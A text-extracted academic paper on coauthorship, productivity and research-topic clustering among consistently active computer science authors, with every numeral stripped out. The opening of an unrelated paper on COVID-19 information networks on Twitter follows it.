al. 
( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the increment of collaboration based on local neighborhood structure; pan & saramäki ( ) and ke & ahn ( ) studied the relationship between tie strength and network topology in coauthor network and found its difference with social networks in general. besides, research collaboration has always been an important component when considering policies towards research. many works focusing on research policy studies have tried to evaluate the efficiency of resource management in system based on researchers’ collaboration behavior. classic works in this field include katz & martin ( ), where the authors studied research collaboration at different levels and argued for a more symmetrical approach in comparing the costs of collaboration with the benefits; and lee & bozeman ( ), where the authors investigated the impact of research collaboration on scientific productivity and showed the different impacts at individual level and community level. they also proposed considering collaborations in terms of the extent to which resources fit research needs. there are also works based on surveys of individual researchers’ opinions on research collaboration such as melin ( ), where the author suggested that research policy should provide financial and organizational possibilities for the researchers to establish joint ventures and also fund projects on a team or network basis. another group of papers related to our work studied the factors that may influence productivity or authors’ research behavior. for example, gingras et al. ( ) showed the effects of aging on researchers’ publication patterns and described researchers’ publication style during different stages of career. petersen et al. ( ) found the existence of the matthew effect in academic publishing, which may favor senior and experienced researchers. finally, ioannidis, boyack & klavans ( ) was the first to introduce the notion of uninterrupted and continuous presence as a way to identify a set of core authors in a research community, and showed the dominance of these authors in the production of academic outputs. most of the previous works (except ioannidis, boyack & klavans ( )) analyze the entire population of a community. by focusing on top active authors, which is a much smaller, but important and representative subset of the overall population, we are able to find more results about trends in research collaboration (team research), its relationship to research productivity, and the evolution of research topics and focus as well. materials & methods our data is collected from microsoft academic search (mas) (http://academic.research. microsoft.com/). mas gathers bibliographic information from the principal scientific publishing services covering papers from to present, and uses its own classification scheme based on research fields and more than subdomains to classify different papers (orduña-malea et al., ). for example, the fields include computer science, physics, and mathematics, and papers in the computer science field can be further categorized into subdomains such as “databases”, “machine learning and pattern recognition”, “networks and communications” and so on. each paper is labelled with some papers are only classified as computer science papers, but not categorized into any subdomain. a unique numerical id; its metadata includes paper title, author list, publication year, wu et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com/computer-science/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://academic.research.microsoft.com/ http://dx.doi.org/ . /peerj-cs. table dataset description. field coverage computer science time coverage (year) – #papers , , #authors , , #paper-author mapping links , , publication venue and a reference list. likewise, authors are maintained as another type of object. each author is labelled with a unique numerical id as well; its metadata includes current affiliation and publication history. an author’s research field and research subdomains in that field can be obtained from his publication history. we choose the computer science field, which seems most complete (and we are most familiar with) for a case study in this paper. the same methodology can be applied to data from other sources, pertaining to other scientific disciplines. based on the mapping information of papers and authors, we can obtain the detailed evolution trend of author collaboration and author productivity for both top active authors and average authors. this can show us the general trend in the community as a whole, and also the difference between top active authors and average authors. besides, since our metadata comes with classification of each paper into a research subdomain in computer science, it is possible to tell the subdomains each top active author works in. given the moderate size for the set of all top active authors, it is possible to apply graph clustering algorithms to find the collaboration clusters for top active authors in computer science over time, and characterize these clusters in terms of the major subdomains they are working on. such analysis will show us the research topic trend in computer science. considering the fact that the data for the earlier and the most recent years are less complete, we take the data in the -year window [ , ] for our analysis in this paper. note that although orduña-malea et al. ( ) pointed out the limitation of the the data from mas was lastly collected on july , . 
data from mas, which includes the decreasing update rate and incomplete indexation of all papers recently, the limitation and misleading information lies mostly in the data starting from , as the authors indicated. therefore, we believe the data in the time window we focus on is relatively reliable, and will not affect the validity of our results. we also filter out paper records without publication year or author information for this study. table presents a general description of our dataset. the more detailed evolution of the dataset is shown in fig. , where we plot the annual number of active authors and papers each year in the time window [ , ]. the rapid expansion of the computer science field can be observed clearly. results comparing top active authors and average authors in this section, we analyze and compare the collaboration levels and patterns of top active authors versus average authors, as well as their productivity. we take one active window as wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure number of active authors and papers each year in the time window [ , ]. an example, and show the detailed comparison across different years in that window. since results in other active windows are similar, we then show brief results across different active windows, instead of the detailed comparison in each active window. top active authors ioannidis, boyack & klavans ( ) defined “ucp authors” by considering a specific window of years, from to , and observed that there are about % such authors. for our purposes, we define the top active authors based on the ucp metric. for each year to be used as the start of a window, we find the top % authors in terms of the length of uninterrupted and continuous presence from that starting year. this gives rise to an active window size for top active authors for each year. for example, starting from year , the active window size needs to be set as (which means the ending year of that active window is ), in order to make the percentage of top active authors among authors with at least one publication in that window around %. smaller window size will lead to a higher percentage than % while larger window size will lead to a lower percentage. for clarity, we show an example of top active author versus non-top active author in the active window [ , ] in fig. , where their annual number of publications during that period is plotted. with this definition, it is observed that the active window size required to be counted as a top active author is different for each starting year. in fact, this active window size is growing steadily over the years, as shown in fig. . this certainly correlates well with our impression that the top authors are becoming more and more active. the number of years required to become a top active author starting from is around , which is a little less than that found in ioannidis, boyack & klavans ( ). this is not too surprising considering the research field and dataset studied are both different. but the result is in the same ball park. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure example of top active author versus non-top active author in the active window [ , ]. figure change of active window size. comparison on collaboration we first compare the collaboration patterns of top active authors with that of average authors. 
top active authors is the author set including all top active authors in an active window, while “average authors” is the author set including any author with at least one publication in an active window. so average authors is a superset of top active authors. we take the active year window [ , ] for comparison. we compare the nature and extent of collaboration, such as the size of coauthors set, collaboration strength and team connectivity, and then the productivity. we will show the brief comparison results across different active windows later. one important measure for the extent of collaboration of an author, obviously, is the size of the coauthors set. figure shows the average number of coauthors per author for top active authors and average authors on an annual basis. here the coauthors include top active coauthors and non-top active coauthors. the figure shows that top active authors wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of coauthors set size between top active authors and average authors. generally have more coauthors than average authors. moreover, the top active authors also have a significantly higher increase rate of coauthors, although more collaboration is the trend for the whole community (o’brien, ; wuchty, jones & uzzi, ). a likely reason for the much higher number of coauthors for top active authors is directly due to “team science” and the growth in team size. as the collaboration pattern in a team is often hierarchical, and the top active authors are more likely at the root of the hierarchy, they would naturally have more collaborators and benefit from growth of team sizes. if we assumed the coauthor network is built by preferential attachment (lee et al., ), we would reach the same conclusion for top active authors. to further understand the collaboration pattern by top active authors, we also show the coauthors set size of the same set of top active authors during their pre top-active period and post top-active period for ten years in fig. . it is clear that even before and after their top-active period, top active authors tend to have more coauthors. the difference between top active authors and average authors in the ten years before their top-active period is not so much as that in later periods. but there still exists slight advantage to top active authors. this indicates that in order to become top active authors, it is important for authors to build and expand their research teams in the very beginning. the further growth of the number of coauthors in the post top-active window is likely due to the reputation and connections they accumulated during their top-active period. in a social network, while the number of friends may show the size of one’s social connections, the length of the friendship one keeps with others can better reflect the extent of one’s influence in his social network. similarly, in the study of research collaboration, we can also use the collaboration length between one and his coauthors to represent one’s influence in his research community. again we compare top active authors with average authors using the active window [ , ]. figure a shows the distribution of collaboration length in the -year active window for top active authors and average authors. we observe that for both top active authors and average authors, more than half of the collaboration links exist for only one year, which shows the dominance of wu et al. ( ), peerj comput. 
sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of collaboration length between top active authors and average authors. (a) is the distribution of collaboration length. (b) is the distribution of one-year link. table analysis on connected components. statistical measurement top active author average author #nodes in network , , #links in network , , #connected components , #nodes in giant component , , short-term research teams. however, top active authors are more likely to have longer collaboration relationship with others. this indicates that although top active authors have a rapid expansion rate of coauthors, there still exist some stable collaboration links. for the transient links which last for only one year, the distribution of the year in which the one-year collaboration happens is plotted in fig. b. while it is almost uniformly distributed in the years for top active authors, it is left skewed for average authors. top active authors keep a regular proportion of transient collaboration links, while the average authors have more short-term collaboration links in recent years, which may be the result of rapid increase of paper publishing over years. next, we analyze the structure of the coauthor networks built in the -year window by top active authors and average authors respectively. here the coauthor network of top active authors contains the collaboration between top active authors only and the average author coauthor network consists of all the authors with publications in the specific time window. for simplicity, we have removed authors with no coauthors (single nodes only) in the two networks. the result is shown in table , where we focus on the analysis of connected components in the two networks. the number of connected components is a lower bound to the estimated number of clusters in the coauthor network. it reflects the connectivity in the network as a whole. as shown by table , top active authors are more connected with each other while for average authors, small teams are more popular. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of productivity for top active authors and average authors. (a) is the comparison of ip. (b) is the comparison of cp. comparison on productivity besides the collaboration patterns, a more direct assessment of an author’s activity in the community is productivity, which is often reflected by the annual publication rate of an author. before going to the detailed discussion of productivity, we define two notations first: individual productivity (ip) and community productivity (cp). ip is the annual number of claimed papers per author. thus ip is incremented for an author every time his name appears in a paper. cp, on the other hand, is based on the fractional contribution of each coauthor towards a paper (equal division assumed). cp counts each paper only once, while ip counts each paper n times when there are n coauthors. figure shows the comparison of ip and cp for top active authors and average authors. similar to the comparison of coauthors, we also include productivity behaviors in the ten years before and after the top-active period. for the comparison of ip, we can see that ip almost doubles in the years for average authors, while it is much more than doubled for top active authors. 
this can be partially explained by the different coauthors set sizes of top active authors and average authors. different from cp, the contribution of coauthors can help increase one’s ip. we can see in fig. that while the annual number of coauthors for average authors increases from to in the years, it increases from to for top active authors in the same period. such a rapid expansion of collaboration thus inevitably leads to more productivity for top active authors. for cp, there is a slight decreasing trend for average authors, whereas for top active authors, the trend is increasing over the years. this shows that although the top active authors are consistently increasing their productivity, whether measured by ip or cp, the productivity (cp) of the average authors are actually decreasing. this phenomenon was also observed and discussed in the context of team science (wuchty, jones & uzzi, ). comparison across different active windows now we show the brief comparison results between top active authors and average authors across different active windows. as previously, we do the comparison on collaboration and productivity. for collaboration, the average annual number of coauthors per author wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of coauthors set size between top active authors and average authors across different active windows. in each active window starting from different years is plotted in fig. . the calculation is as follows: for each targeted author, we count his number of active years and number of distinct coauthors in one active window (that means if a coauthor collaborates multiple times with the targeted author in an active window, we only count him once.). with the two numbers, we obtain his annual number of coauthors in the active window. then we do average on the targeted author set, and get the comparison result between top active authors and average authors. from fig. we see that in the earlier windows, there is not much difference between top active authors and average authors, they have coauthors with almost the same scale. however later, top active authors show great advantage over average authors in attracting coauthors. we see that in the last active window starting from , the average annual number of coauthors per author is almost doubled for top active authors than average authors. for productivity, we also do the comparison on ip and cp. the comparison result is shown in fig. , where we plot the average annual number of papers per author in each active window starting from different years. the calculation is similar to the previous calculation for coauthors. we see that for ip, while average authors behave consistently over different active windows, top active authors show a rapidly increasing trend. for cp, while average authors show a decreasing tendency, top active authors are still able to achieve increasing productivity, although the increase rate is not that large when compared to the ip case. in summary, the comparison results between top active authors and average authors across different active windows are consistent with our previous findings in one active window. the analysis and comparison of top active authors and average authors, on both collaboration and productivity, give us further insights into the trend of team research. 
top active authors are able to achieve more sustained research activity, much higher level of research output, and accelerated growth in research output. this may be partially explained by their ability to build research teams, as well as to form extensive research wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of productivity for top active authors and average authors across different active windows. (a) is the comparison of ip. (b) is the comparison of cp. collaboration with a broader range of other authors including top active authors. in this regard, the top active authors might be treated as the core of the research community. collaboration among top active authors from our analysis above, top active authors can be considered as the core of their academic community. their collaboration and communication plays a significant role in knowledge diffusion and research development in academia. and the evolution of their collaboration patterns also reflect the research trend in the whole community. therefore, we take an analysis on the collaborations among those top active authors in this section. for the study of top active author collaboration, two important aspects of the collabo- ration network is its topology and tie strength. while network topology demonstrates the way top active authors link with each other, tie strength indicates the closeness of the linked top active authors. our focus for this study is thus the relationship between the tie strength and network topology of the coauthor network of top active authors. previous studies on this have shown different results. granovetter ( ) and onnela et al. ( ) have already shown that in ordinary social networks, members usually communicate more frequently with other ones in the same community. therefore in the communication network built by community members, if we define the tie strength in the network by their communication frequency, we can find that stronger ties exist mostly inside a community, while ties between different communities are usually weaker. however, in coauthor networks, it is shown in pan & saramäki ( ) and ke & ahn ( ) that on the contrary, the tie strength is usually much weaker among authors in the same community than authors in different communities. then as the core of the academic community, for top active authors, what will be the case in their coauthor network? before we take a detailed analysis on this, we first give formal definitions on the measurement of tie strength between coauthors and network topology. following the practice of newman ( ), we define tie strength, i.e., collaboration link weight between wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. author i and one of his coauthor j by wij =  p np − , ( ) where p is the set of papers that author i and j have coauthored, and np is the number of authors of paper p. therefore, for the coauthor network of top active authors, wij is calculated based on all the coauthored papers by two top active authors in an active window. note that the definition of the collaboration link weight here considers not only the collaboration length between two top active coauthors, but also their collaboration frequency. for the network topology, we focus on the measurement of the similarity of two coauthors’ neighborhood, which may reflect whether two coauthors are in the same community or not. 
so we define the neighborhood similarity of author i and author j by oij = nij di − + dj − − nij , ( ) where di is the node degree of author i, dj is the node degree of author j, and nij is the number of common neighbors of author i and author j in the coauthor network (onnela et al., ) of top active authors. thus oij reflects the link overlap of two top active coauthors. after the introduction of the above definitions, we then do analysis on the coauthor network of top active authors. we take two sets of top active authors in the active windows [ , ] and [ , ] respectively, and study the evolution by comparing the difference between them. as with the previous analysis, we build the two coauthor networks based on the existence of collaboration links between top active authors in each window respectively. note, for these two networks only the top active authors in the respective time windows are included. the top active authors without any coauthors (hence singleton nodes) are removed, and the top active coauthor pairs with no other neighbors (in which case the denominator for oij is ) are also removed. figure shows the relationship between the link overlap and tie strength of the two coauthor networks respectively. we see that the coauthor network of top active authors presents a pattern in between the patterns in ordinary social network and general coauthor network respectively. on one hand, a similar trend as the ordinary social network is displayed (right hand side part of figs. a and b). for links with large weight, the link overlap is also relatively large. this shows the general trend when doing research that many authors will collaborate when they study similar topics. on the other hand, there are author pairs in the same community but seldom collaborating (left hand side of figs. a and b). those authors might be research leaders working on the same specific topic. each of them has many coauthors in the same area, but they do not collaborate often directly, since they need to compete with each other in order to get resources and support for their own research. therefore, although they might have large overlap of coauthors, they do not collaborate wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure relationship between link overlap and link weight in the two active windows. we use log- arithmic binning for wij and choose the median value of oij in a bin. (a) is the result in [ , ] window. (b) is the result in [ , ] window. figure the relative size of the remaining giant component as a function of the fraction of removed links in the two active windows. (a) is the result in [ , ] window. (b) is the result in [ , ] window. much directly. there are also author pairs with very small link overlap but relatively large link weight (the middle part of figs. a and b). this indicates the collaboration between different communities, thus the interdisciplinary research trend in computer science. to confirm our conclusions above, we also do analysis on the giant component of each coauthor network of top active authors. we remove links one by one from the giant component based on the link weight, either in decreasing order or increasing order, and keep track of the size of the remaining giant component as a function of the fraction of removed links. the result is shown in fig. . 
we see that in general, the giant component shrinks faster when the stronger links are removed first, which indicates that links are stronger between different communities. this phenomenon is similar to the case in general coauthor network, but they have quite different implications. for the general coauthor network, the weaker connection inside a community is due to the junior students in a research group (pan & saramäki, ), while for the coauthor network of top active authors, since each node represents a senior researcher, the relatively weaker connection wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure comparison of clustering results in the two active windows. (a) is the result in [ , ] window. (b) is the result in [ , ] window. inside a community is due to their competition in the same topic, and the stronger connection between different communities is due to the collaboration in interdisciplinary topics. besides, by comparing fig. a with fig. b, we find that the gap between the two shrinking curves are becoming larger, and the giant component is also becoming more resistent to the removal of links. in fig. b, most of the nodes still exist in the giant component even when half of the links are removed. the larger gap implies more strong connections and less weak connections between communities, which again shows the interdisciplinary research trend. the better resistance to link removal means that inside the same community, there are more links with the strongest/weakest connections. it indicates on one hand the collaboration of senior authors in the same topics, on the other hand the fierce competition among research leaders on similar topics. topic trend based on top active author collaboration based on the leadership status of top active authors in their academic community, we can also get a sense of what have been the hot topics in the community, by observing the evolution of the research topics the top active authors work on. for this study, we still take the two sets of top active authors in the active windows [ , ] and [ , ] respectively, and compare the differences between them. as with the previous analysis, we first build the two coauthor networks based on the existence of collaboration links between top active authors in each window respectively, and remove the top active authors without any coauthors, as they will not be part of any clusters anyway. we then apply the clauset–newman–moore algorithm (clauset, newman & moore, ) to do clustering for the two coauthor networks. this algorithm is based on the optimization of the network modularity, which measures when the clustering is a good one, in the sense that there are many edges within clusters and only a few between them. figure shows the clustering result for the two windows. different clusters are put in different grids, with blue nodes representing top active authors in clusters. the grey lines between nodes in different grids represent the collaboration relationships wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure major subdomain of top active authors in the two active windows. (a) is the result in [ , ] window. (b) is the result in [ , ] window. among different clusters. we can see that in the earlier window, the clusters are more fragmented. the smallest cluster contains only two authors (the minimum possible size). 
the connections (represented by the number of links) between different clusters are not strong. our interpretation is that in the earlier years, researchers tended to work more in isolation or with small scale (e.g., thesis mentor-mentee type of ) collaboration, with little cross teams collaboration. the period [ , ] is also before the advent of www, which might be attributed as an important factor of increased research collaboration. in the second window [ , ], however, four largest clusters with similar sizes emerged and seemed to dominate all the other clusters in size. moreover, many more collaboration links exist between different clusters. this indicates that computer science as a research field had become more interdisciplinary (at least within its field) with much more extensive collaboration among its researchers, which has been shown in previous analysis. since our clustering is conducted based on the existence of collaboration links, and through the publications of each top active author we extract their major research subdomains, we can visualize research as the mixing (or collaboration) of ideas from different research subdomains. for the years in the first window of time, a few research subdomains are the focus of research then, and many other research ideas were emerging and small research subdomains were just being formed. this is manifested by the large number of research clusters, the minimal collaboration between these clusters, and each cluster hosting a relatively homogeneous group of researchers. this is illustrated in fig. a, where each node still represents a top active author, with a color representing the major research subdomain of that author (if an author publishes in multiple subdomains, then the major subdomain is the one most of that author’s publications during the top active period belong to.). by the second window of years, a large number of top active authors belong to the four major clusters with heavy intra-cluster collaboration, with a relatively small fraction of top active authors still working in smaller clusters. furthermore, wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the four clusters are no longer so homogeneous, with a more mixed set of colors, as shown in fig. b. again, each node corresponds to a top active author, with a color representing the major subdomain that top active author works in, during the respective time window. by now, you must be curious about what the large clusters in each of these two windows are. we show the answers in figs. a and b for these two time windows. for each cluster, we show its composition in terms of the distribution of its researchers from the subdomains of our metadata. for the earlier time window [ , ], the top three we use subdomain name “computer science” to represent papers belonging to computer science, but not catego- rized into any subdomain. clusters are made up of mostly ( ) “algorithms and theory” people, ( ) “databases” people, and ( ) “programming language” people respectively. by the second time window, the top four dominating clusters are each hosting a more mixed set of top active authors, with the dominating subdomains being, respectively ( ) “algorithms and theory” and a set of application or technology areas, including “networks and communications”, “security and privacy”, “computer vision”, “graphics” etc. 
( ) “databases” and “artificial intelligence” and some application or technology areas, including “networks and communications”, “human computer interactions”, “data mining” etc. ( ) “hardware and architecture”, “software engineering” and “distributed and parallel computing”, which may all be considered to be related to computing systems. ( ) “artificial intelligence”, “machine learning and pattern recognition”, “multimedia”, “natural language and speech”, and “networks and communications”, which may all be considered to belong to multimedia technology, applications and systems. these large clusters seem to map to the hot research areas and focus in computer science during those time periods. from fig. b, since there are more mixing of different subdomains in forming large clusters, we can also get a sense which subdomains tend to mix (collaborate) with others, and which subdomains tend to mix with each other. it seems “networks and communications”, perhaps playing an infrastructure or glue role, tend to mix with others the most. “artificial intelligence” seems to mix mostly with “machine learning” and “databases”, which perhaps represent the “thinking” and “memory” aspects of artificial intelligence. finally, it is also clear that the trend is for more and more interdisciplinary research, rather than for people in each subdomain working alone, which corroborates with previous findings. discussion our study is only based on publication and coauthorship data, so it is not possible to make meaningful assessment of research impact. a useful future direction is to incorporate the study of the research impact, based on whatever reliable measures for that, of top active authors and non-top active authors. this will help us further understand how good research results are achieved in the era of team research. nonetheless, the insights from our study should still be helpful to policy makers in academia. for example, different wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure subdomain distribution in the two active windows. (a) is the result in [ , ] window. (b) is the result in [ , ] window. wu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. evaluation frameworks may be used for different types of authors to get proper assessment of the different roles in team research. by serving as the core of the community, and as leaders of research teams, the top active authors tend to easily build up his/her academic output quantitatively, compared to less active authors and newcomers. it is necessary to take into account of the different roles, to help better assess the individual contributions, and give proper recognition. besides, considering the evolution of different research topics in the community, we might have some mainstream topics which attract much attention from the community, just as the large clusters observed above. however, we may also have some topics which are relatively cold and studied only by a small group of authors. it is natural that funding institutions might tend to support research proposals on mainstream topics. however, the study on some cold topics should also not be ignored. they need to find a balance between the research topics studied by different scales of authors. and it is the governors’ responsibility to make efficient resource allocations on different research topics based on their evolution patterns. 
the evolution of research topics and the clustering of these topics may also have some interesting implications. on the one hand, it is encouraging to see more and more collaboration between authors leading to increasingly interdisciplinary research, which arguably leads to better research. on the other hand, it may also be a manifestation of the tendency of researchers to pursue hot topics, which is a less risky approach in a very competitive research environment. policy makers may consider the proper balance between the convergence and diversity of researchers. nowadays, there is plenty of research funding encouraging research collaboration, not only between departments within a university, but across universities in a region, and also internationally, which is consistent with the trend of increased collaboration we observe. the nature of inter-team collaboration is worth further study. on the one hand, it is possible that collaboration mostly brings together researchers of different backgrounds so that they complement each other. on the other hand, it is also possible that collaboration brings together teams working on the same topics (forming larger teams), which may reduce competition. the situation is likely a combination of both cases. an in-depth study of the trend and effectiveness of such collaboration behavior will also help funding policy makers. despite the insights we get from our findings, we understand that there are some limitations in our dataset. as mentioned by orduña-malea et al. ( ), mas has incomplete indexation of papers in recent years, which may result in a relatively smaller coverage for mas than for other popular bibliographic databases like isi web of science and scopus. but our focus in this paper is only the computer science field, not science research in general, and we only used data before , the year when the incomplete indexation problem began to appear in the mas dataset (orduña-malea et al., ). with these restrictions, we think the data from mas is good enough. an important reason for using the mas data is that it comes with tagging of the papers by subdomains, which allows us to tag authors as well. this is a feature necessary for us to study the trend of research topic clustering. the author name ambiguity problem is still a challenge for us. the mas data has gone through some editing to remove some name ambiguity problems. without involving authors to help correct ambiguity problems (as implemented by google scholar), the problem is not eliminated. however, in our study, since most analysis is at the statistical average level over different author sets, we believe the impact is not that severe. besides, for the topic trend study, since only major subdomains are considered, this also removes some of the bias caused by duplicate records of authors.

conclusion
in this paper, we analyzed a new set of authors, i.e., top active authors, who have an uninterrupted and continuous presence in the scientific literature over a period of time. top active authors may thus represent the most active researchers and serve as the core workforce in the community. we analyzed and compared the collaboration patterns and productivity of top active authors versus average authors in the computer science field.
results show that top active authors serve as the core of the research community and that the study of top active authors can help us better understand the general trend of team research in the community. we also studied research topic trends by analyzing the evolution of the coauthor network structure of top active authors and the detailed research topics the top active authors work on. results indicate that computer science, as a research field, is showing an increasing tendency toward interdisciplinary research. our conclusions not only show the general trends in doing research in the academic community, but also provide insights for policy researchers and policy makers in academia to develop better evaluation methods and manage resources more efficiently. our analysis is just an initial attempt at understanding and visualizing the general trend in the academic ecosystem. for future work, analysis of datasets in other research fields can be conducted, and more measurements besides the ones we focused on in this paper can also be proposed. theoretical analysis and modeling of authors' team research patterns are of interest as well.

additional information and declarations
funding
the authors received no funding for this work.
competing interests
the authors declare there are no competing interests.
author contributions
• yan wu conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
• srinivasan venkatramanan and dah ming chiu conceived and designed the experiments, wrote the paper, reviewed drafts of the paper.
data availability
the following information was supplied regarding data availability: the data we used belongs to microsoft academic search and is available upon request from microsoft: http://datamarket.azure.com/dataset/mrc/microsoftacademic. another project that made the data available (upon request) is at: http://cse.iitkgp.ac.in/resgrp/cnerg/. the latter source of data has been pre-processed for ease of use.

references
brookshear jg. . computer science: an overview. th edition. addison-wesley. pp. clauset a, newman me, moore c. . finding community structure in very large networks. physical review e ( ): doi . /physreve. . . gingras y, lariviere v, macaluso b, robitaille j-p. . the effects of aging on researchers' publication and citation patterns. plos one ( ):e doi . /journal.pone. . granovetter ms. . the strength of weak ties. american journal of sociology ( ): – doi . / . huang j, zhuang z, li j, giles cl. . collaboration over time: characterizing and modeling network evolution. in: proceedings of the international conference on web search and data mining. acm, – . ioannidis jp, boyack kw, klavans r. . estimates of the continuously publishing core in the scientific workforce. plos one ( ):e doi . /journal.pone. . katz j. . geographical proximity and scientific collaboration. scientometrics ( ): – doi . /bf . katz js, martin br. . what is research collaboration? research policy ( ): – doi . /s - ( ) - . ke q, ahn y-y. . tie strength distribution in scientific collaboration networks. physical review e ( ): doi . /physreve. . . kunegis j, fay d, bauckhage c. . network growth and the spectral evolution model.
in: proceedings of the th acm international conference on information and knowledge management. acm, – . lee s, bozeman b. . the impact of research collaboration on scientific productivity. social studies of science ( ): – doi . / . lee d, goh k-i, kahng b, kim d. . complete trails of coauthorship network evolution. physical review e ( ): . melin g. . pragmatism and self-organization: research collaboration on the individual level. research policy ( ): – doi . /s - ( ) - . newman me. . the structure of scientific collaboration networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . . o'brien tl. . change in academic coauthorship, – . science, technology & human values ( ): – doi . / .
onnela j-p, saramäki j, hyvönen j, szabó g, lazer d, kaski k, kertész j, barabási a-l. . structure and tie strengths in mobile communication networks. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . orduña-malea e, martín-martín a, ayllón jm, delgado lópez-cózar e. . the silent fading of an academic search engine: the case of microsoft academic search. online information review ( ): – doi . /oir- - - . pan rk, saramäki j. . the strength of strong ties in scientific collaboration networks. europhysics letters ( ): doi . / - / / . petersen am, riccaboni m, stanley he, pammolli f. . persistence and uncertainty in the academic career. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . uddin s, hossain l, rasmussen k. . network effects on scientific collaborations. plos one ( ):e doi . /journal.pone. . wagner cs, leydesdorff l. . network structure, self-organization, and the growth of international collaboration in science. research policy ( ): – doi . /j.respol. . . . wuchty s, jones bf, uzzi b. .
the increasing dominance of teams in production of knowledge. science ( ): – doi . /science. .

© authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /).

connections issue | vol. article | doi: . /connections- .
covid- health communication networks on twitter: identifying sources, disseminators, and brokers
ian kim* and thomas w. valente
department of preventive medicine, keck school of medicine, university of southern california, los angeles, ca. *e-mail: iank@usc.edu

abstract
coronavirus disease of (covid- )'s devastating effects on the physical and mental health of the public are unlike previous medical crises, in part because of people's collective access to communication technologies. unfortunately, a clear understanding of the diffusion of health information on social media is lacking, which has a potentially negative impact on the effectiveness of emergency communication. this study applied social network analysis approaches to examine patterns of #covid information flow on twitter. a total of , , publicly available tweets from , u.s. users were retrieved and analyzed. particular attention was paid to the structures of the retweet and mention networks and to the identification of influential users: information sources, disseminators, and brokers. overall, covid- information was not transmitted efficiently. findings pointed to the importance of fostering connections between clusters to promote diffusion in both networks. the many localized clusters limited the spread of timely information, making it difficult to build momentum in shaping urgent public action. rather than health and communication professionals, non-professional users were predominantly responsible for generating and disseminating major covid- information, raising concerns about the credibility and accuracy of the information. the inadequate influence of health officials and government agencies in brokering information contributed to concerns about the spread of dis/misinformation to the public. significant differences in the type of influential users existed across roles and across networks. conceptual and practical implications for emergency communication strategies are discussed.
keywords covid, information diffusion, health communication, social network analysis, twitter.

since the first case of coronavirus disease of (covid- ) was confirmed in the united states on january , , over million people in the u.s. have had confirmed cases of covid- . despite multiple national- and state-wide interventions and prevention measures, including banning non-essential travel and stay-at-home orders, on april , the usa became the nation with the most deaths globally. as of december , the u.s. death toll surpassed , .
providing up-to-date, accurate information, delivering key messages to the public in a timely manner, and controlling the spread of dis/misinformation can play a crucial role in managing epidemics (homeland security council (us), ; world health organization, ; centers for disease control and prevention, ; department of homeland security, ). covid- 's devastating effects on the physical and mental health of the public are unlike previous medical crises, in part because of people's collective access to communication technologies. covid- is the first pandemic of its kind in the age of social media. the amount and nature of information available to the public has changed significantly and is constantly evolving. unfortunately, a crucial but surprisingly understudied phenomenon is the diffusion of health information on social media (zhou et al., ; aramburu et al., ). twitter, a microblogging service, has become one of the most important sources of real-time news updates, with more than million users in the u.s. (kemp, ). according to a recently published pew research center report, % of american adults get news on social media and % of twitter users responded that they use it to get daily news (matsa and shearer, ). twitter users send and receive short posts called tweets about any topic. tweets can be up to characters long and can include user mentions and keywords. users can forward other users' tweets; these forwarded messages are called retweets. mentions can be used with the at symbol "@" before a username to identify a specific user. by retweeting or mentioning, users interact with other users and share information in a conversation-like manner (wang et al., ). the hashtag symbol "#" can be used before a relevant keyword to initiate conversations or contribute to 